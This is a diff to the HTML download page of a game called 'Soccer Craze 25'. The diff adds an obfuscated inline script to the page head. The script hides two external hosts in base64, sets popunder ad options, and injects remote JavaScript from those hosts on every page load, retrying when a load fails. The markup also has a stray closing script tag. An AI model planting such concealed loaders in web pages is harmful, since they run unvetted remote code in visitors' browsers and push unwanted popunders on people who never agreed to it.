--- a/details.html
+++ b/details.html
@@ -5,6 +5,12 @@
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Soccer Craze 25 - Download</title>
     <link rel="stylesheet" href="styles.css">
+	<script type="text/javascript" data-cfasync="false">
+/*<![CDATA[/* */
+(function(){var d=window,k="c6091132717b20d34e76cec06e96bc01",f=[["siteId",500+793*800*124-73482118],["minBid",0],["popundersPerIP","0"],["delayBetween",0],["default",false],["defaultPerDay",0],["topmostLayer","auto"]],b=["d3d3LnhhZHNtYXJ0LmNvbS9ocGxhbmNrLm1pbi5jc3M=","ZDExZW5xMnJ5bXkweWwuY2xvdWRmcm9udC5uZXQvTy9lb2JqZWN0ZGV0ZWN0Lm1pbi5qcw=="],e=-1,v,w,p=function(){clearTimeout(w);e++;if(b[e]&&!(1768040269000<(new Date).getTime()&&1<e)){v=d.document.createElement("script");v.type="text/javascript";v.async=!0;var i=d.document.getElementsByTagName("script")[0];v.src="https://"+atob(b[e]);v.crossOrigin="anonymous";v.onerror=p;v.onload=function(){clearTimeout(w);d[k.slice(0,16)+k.slice(0,16)]||p()};w=setTimeout(p,5E3);i.parentNode.insertBefore(v,i)}};if(!d[k]){try{Object.freeze(d[k]=f)}catch(e){}p()}})();
+/*]]>/* */
+</script>
+
 </head>
 <body>
 </script>
